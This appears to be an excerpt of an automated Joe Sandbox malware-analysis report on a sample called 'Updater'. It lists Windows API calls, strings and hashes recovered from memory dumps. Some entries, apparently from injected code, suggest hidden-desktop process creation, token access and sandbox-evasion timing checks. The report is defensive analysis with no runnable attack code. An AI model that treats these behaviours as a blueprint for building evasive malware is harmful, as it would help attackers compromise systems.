                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                  • String ID:
                                                                                                  • API String ID: 1539411459-0
                                                                                                  • Opcode ID: e6911fa87d2a287e12dc119c1811eb9e40221bfda50f878f86f7a9d0156bb480
                                                                                                  • Instruction ID: bd63b1ff8a53c70b94f9506dd02f359051c291ff7f42b01eb45489f8613500ae
                                                                                                  • Opcode Fuzzy Hash: e6911fa87d2a287e12dc119c1811eb9e40221bfda50f878f86f7a9d0156bb480
                                                                                                  • Instruction Fuzzy Hash: 2DF05431541358BBDB225F559C0DFCE3F596F1A721F04C000FA12610E187BD59168F9D
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 006F106D
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 006F107C
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 006F1085
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 006F1092
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 42836993ecd335b3446fb1d89667c7b831a9c935434fc32c1dace28f1943ed1c
                                                                                                  • Instruction ID: f6efbb537dd0dd1d790c72404355e8a4ebb9542aa0694ad51bcafdd4f3b1912d
                                                                                                  • Opcode Fuzzy Hash: 42836993ecd335b3446fb1d89667c7b831a9c935434fc32c1dace28f1943ed1c
                                                                                                  • Instruction Fuzzy Hash: 8EF0AF70D2020CEBCB14DBF5D949A9EBBF8FF08301F518496E802E7210E7B8AB049B55
                                                                                                  APIs
                                                                                                  • GetSysColor.USER32(00000008), ref: 006E4A7B
                                                                                                  • SetTextColor.GDI32(?,?), ref: 006E4A85
                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 006E4A98
                                                                                                  • GetStockObject.GDI32(00000005), ref: 006E4AA0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Color$ModeObjectStockText
                                                                                                  • String ID:
                                                                                                  • API String ID: 4037423528-0
                                                                                                  • Opcode ID: 74b4aec09841941cc3cf575750e011e160bd8b3d03e1a172abb77f8ffcba88bd
                                                                                                  • Instruction ID: 1c67e9f255a5498a1f8cf07d1d879f76c487642d40f4ef681e12846f89af11ba
                                                                                                  • Opcode Fuzzy Hash: 74b4aec09841941cc3cf575750e011e160bd8b3d03e1a172abb77f8ffcba88bd
                                                                                                  • Instruction Fuzzy Hash: F2E0A031A81348AADB315B35BC08BD83B21AB12332F04C319FABA440E0CBB609509B11
                                                                                                  APIs
                                                                                                  • GetCurrentThread.KERNEL32 ref: 00732748
                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,007322E5), ref: 0073274F
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007322E5), ref: 0073275C
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,007322E5), ref: 00732763
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                  • String ID:
                                                                                                  • API String ID: 3974789173-0
                                                                                                  • Opcode ID: 5b6dc2aabaff299325f4318df08c7e54cb7a54bd6172be3ae9bf5ba17549169d
                                                                                                  • Instruction ID: 5cef51bdbcc221c814ae42cd9baa60bee1f5b9ece30b5d389b17c7b473727a37
                                                                                                  • Opcode Fuzzy Hash: 5b6dc2aabaff299325f4318df08c7e54cb7a54bd6172be3ae9bf5ba17549169d
                                                                                                  • Instruction Fuzzy Hash: 81E08631B11311ABE7301FB19E0CB463B6CAF44791F118414F247C9095D6FC8842C759
                                                                                                  APIs
                                                                                                  • GetDesktopWindow.USER32 ref: 007156F9
                                                                                                  • GetDC.USER32(00000000), ref: 00715703
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0071570F
                                                                                                  • ReleaseDC.USER32(00000001), ref: 00715730
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2889604237-0
                                                                                                  • Opcode ID: d56da2296944b941a0d5162e67ecf0b46acc0443004347877910187d89ead540
                                                                                                  • Instruction ID: e9976ac9c7159b05f5aaf5bcd4503807b1e6a3fe936a44712db7b06768847542
                                                                                                  • Opcode Fuzzy Hash: d56da2296944b941a0d5162e67ecf0b46acc0443004347877910187d89ead540
                                                                                                  • Instruction Fuzzy Hash: F2E0E5B1E10300EFCB61AFA0D80865DBBB2AB48360F11C049E80AA3320DBB89A419F05
                                                                                                  APIs
                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 006FE1AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorHandling__start
                                                                                                  • String ID: pow
                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                  • Opcode ID: 12976764c7d3f4f15ba7987ac2d346af699ab096b54b423e010b69116eff9247
                                                                                                  • Instruction ID: bdca97e47f481e08dd1584d4d1d1ea189cb2206ae8532297f9da76d47ba69dbd
                                                                                                  • Opcode Fuzzy Hash: 12976764c7d3f4f15ba7987ac2d346af699ab096b54b423e010b69116eff9247
                                                                                                  • Instruction Fuzzy Hash: D7518A71E0C105D6E729B714C9413BA3FE99B40741F208E68E185823F9EB3E9CD1DA9A
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000), ref: 006DC9B1
                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 006DC9CA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                  • String ID: @
                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                  • Opcode ID: 276686dfcf6cbc214f22dddeb904c5d4682c8039857f5f3d29e8c76c7b3afee1
                                                                                                  • Instruction ID: 0679bf75d62e888ad2c2198b8d68df643a397f0f7948a81103b18d8999d05277
                                                                                                  • Opcode Fuzzy Hash: 276686dfcf6cbc214f22dddeb904c5d4682c8039857f5f3d29e8c76c7b3afee1
                                                                                                  • Instruction Fuzzy Hash: 345149729187459BD360AF10D896BAFBBF8FF94300F51884EF1D841295EB708529CB6B
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: BuffCharUpper_wcslen
                                                                                                  • String ID: CALLARGARRAY
                                                                                                  • API String ID: 157775604-1150593374
                                                                                                  • Opcode ID: 1c2da81b9e9385e43133a8be01f287222feebf3c333589d31fefe192b5d4846d
                                                                                                  • Instruction ID: 4302e4217ed82db3fb3ab31bf0102fa7a93adfafabce831bcd8620eb29290b00
                                                                                                  • Opcode Fuzzy Hash: 1c2da81b9e9385e43133a8be01f287222feebf3c333589d31fefe192b5d4846d
                                                                                                  • Instruction Fuzzy Hash: 49418E71E002189BCF50EF58C885AFEB7B1EF19314F808169ED15AB391D7B99D49CB90
                                                                                                  APIs
                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0073D210
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoItemMenu
                                                                                                  • String ID: 0$p)z
                                                                                                  • API String ID: 1619232296-3895728235
                                                                                                  • Opcode ID: 2f8405fc63394cf900d9868b036b07065364f7eecd21da404105c32d7a96ae12
                                                                                                  • Instruction ID: 55998b2014f91992e306caaed9179ce147d6695239c97a681ca6156150c11785
                                                                                                  • Opcode Fuzzy Hash: 2f8405fc63394cf900d9868b036b07065364f7eecd21da404105c32d7a96ae12
                                                                                                  • Instruction Fuzzy Hash: 8731F3B290021A9BFB24DFA8E8417EEBBA5FB09350F144128F951E7283D778DD04CB90
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00764FEE
                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00765003
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID: '
                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                  • Opcode ID: 5c09674a4352c9f4cce065ae23dab4b4d395ca67b409dbf5f1bed1d72ed462af
                                                                                                  • Instruction ID: 34ad43992da7b4e8450acbfe88852dcc16962fa0e1605c450b0e967761e2d336
                                                                                                  • Opcode Fuzzy Hash: 5c09674a4352c9f4cce065ae23dab4b4d395ca67b409dbf5f1bed1d72ed462af
                                                                                                  • Instruction Fuzzy Hash: 2B411874A0130A9FDB14CFA9C880BEABBB5FF49300F14416AED06AB351D775A951DF90
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,014A57AF), ref: 014A5757
                                                                                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,014A57AF), ref: 014A575D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DateFormatLocaleThread
                                                                                                  • String ID: yyyy
                                                                                                  • API String ID: 3303714858-3145165042
                                                                                                  • Opcode ID: f45a4d64bcd8fcc8532352b08074a8d74506780d779907cb28ddf37843fd6b71
                                                                                                  • Instruction ID: 3ba99195a2049d160b5060808e9cf5962ea3d8980baf518551f0e7170df2d26f
                                                                                                  • Opcode Fuzzy Hash: f45a4d64bcd8fcc8532352b08074a8d74506780d779907cb28ddf37843fd6b71
                                                                                                  • Instruction Fuzzy Hash: A621327D600209DFDB11EB99D941A9E77B8EF38710F92046BF905EB360D6709E04C661
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E4570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006E45AE
                                                                                                    • Part of subcall function 006E4570: GetStockObject.GDI32(00000011), ref: 006E45C2
                                                                                                    • Part of subcall function 006E4570: SendMessageW.USER32(00000000,00000030,00000000), ref: 006E45CC
                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00764110
                                                                                                  • GetSysColor.USER32(00000012), ref: 0076412A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                  • String ID: static
                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                  • Opcode ID: 731f599e0aaa93275500bd88fd5b892d145f6946f49b32c2a17988ec112f0c5b
                                                                                                  • Instruction ID: de085bf74bcb01ebb178f9d09a6717fcdd3728f66a9465d1d62ee413368e3014
                                                                                                  • Opcode Fuzzy Hash: 731f599e0aaa93275500bd88fd5b892d145f6946f49b32c2a17988ec112f0c5b
                                                                                                  • Instruction Fuzzy Hash: A3212972A1020AAFDB10DFA8CC45AFA7BF8EB19314F014615FD5AD3150E639E8619B60
                                                                                                  APIs
                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 0073D319
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoItemMenu
                                                                                                  • String ID: 0$p)z
                                                                                                  • API String ID: 1619232296-3895728235
                                                                                                  • Opcode ID: c4bcc389855192296701e91a3a8351e418eb8341d9bdd44b03f76b7c4d24b28e
                                                                                                  • Instruction ID: b15892071f0c11c6334e396ec6de96707aabae7f911036d6c9f01031ba44a8a0
                                                                                                  • Opcode Fuzzy Hash: c4bcc389855192296701e91a3a8351e418eb8341d9bdd44b03f76b7c4d24b28e
                                                                                                  • Instruction Fuzzy Hash: 3511E672D05218EBEB31EB5CF844BDE77B9AB46310F044125ED11A7292E338EE05C796
                                                                                                  APIs
                                                                                                  • ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000), ref: 014B5E64
                                                                                                    • Part of subcall function 014B5BC9: CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 014B5C93
                                                                                                    • Part of subcall function 014B5BC9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,014B5DC2), ref: 014B5CD4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create$DesktopExecuteProcessShell
                                                                                                  • String ID: .exe$OPEN
                                                                                                  • API String ID: 1246678638-879745837
                                                                                                  • Opcode ID: 56dafcec7fc2b0112c6282fca053bcafd7fc83ab1272323219f6b26029085866
                                                                                                  • Instruction ID: 320229c5339f8116905e3955ffff5d30690e315afd498002cc86a8bc637710b6
                                                                                                  • Opcode Fuzzy Hash: 56dafcec7fc2b0112c6282fca053bcafd7fc83ab1272323219f6b26029085866
                                                                                                  • Instruction Fuzzy Hash: 510192743043057FE710ABAA8C81B9AA69CDB7CA20F62847FB505EB361DAB49D018574
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59
                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00732E74
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                  • String ID: ComboBox$ListBox
                                                                                                  • API String ID: 624084870-1403004172
                                                                                                  • Opcode ID: 10fa3c7ed5dbee002a19b69a01695b90ae708b1dbb8cf8fc00e620fae9f935c7
                                                                                                  • Instruction ID: 8223e4f2f55f95273d06f4bc22cd087c9cefed76fb067ccf3f8058901b0f36da
                                                                                                  • Opcode Fuzzy Hash: 10fa3c7ed5dbee002a19b69a01695b90ae708b1dbb8cf8fc00e620fae9f935c7
                                                                                                  • Instruction Fuzzy Hash: 26012871A40219AB9F54EBA0CC5ADFE736AAF12320F040B1EFC63533D3DE3958088660
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59
                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00732D6C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                  • String ID: ComboBox$ListBox
                                                                                                  • API String ID: 624084870-1403004172
                                                                                                  • Opcode ID: 892110765abab09b9088852433e0a2693d39e38a594caa42264ffa90d082fa23
                                                                                                  • Instruction ID: 5bb126515b66582b964961e9bfcf6d3c4b9ea3b9a91e6a4691b3c01333c9f6ed
                                                                                                  • Opcode Fuzzy Hash: 892110765abab09b9088852433e0a2693d39e38a594caa42264ffa90d082fa23
                                                                                                  • Instruction Fuzzy Hash: 2501F771B50109ABDF54EBA0C956AFF73A99F11340F10012AB90763293DA295E0982B5
                                                                                                  APIs
                                                                                                    • Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45
                                                                                                    • Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59
                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00732DEF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                  • String ID: ComboBox$ListBox
                                                                                                  • API String ID: 624084870-1403004172
                                                                                                  • Opcode ID: b2ef15ecd0ed6a7d6a1eef5ac385b17240eb29752eac364dd2f83478d07b1803
                                                                                                  • Instruction ID: ded519a98ab0dff39446f8eae442c38ac16487487d22a4ec3b26ec91ece34410
                                                                                                  • Opcode Fuzzy Hash: b2ef15ecd0ed6a7d6a1eef5ac385b17240eb29752eac364dd2f83478d07b1803
                                                                                                  • Instruction Fuzzy Hash: 160126B1B51109B7DF54E7A4C956AFF73AD9B01340F10012ABC0773393DA295E0992B5
                                                                                                  APIs
                                                                                                  • VariantInit.OLEAUT32(?), ref: 00736FEB
                                                                                                    • Part of subcall function 007372DF: VariantInit.OLEAUT32(00000000), ref: 00737347
                                                                                                    • Part of subcall function 007372DF: VariantCopy.OLEAUT32(00000000,?), ref: 00737351
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0073700F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
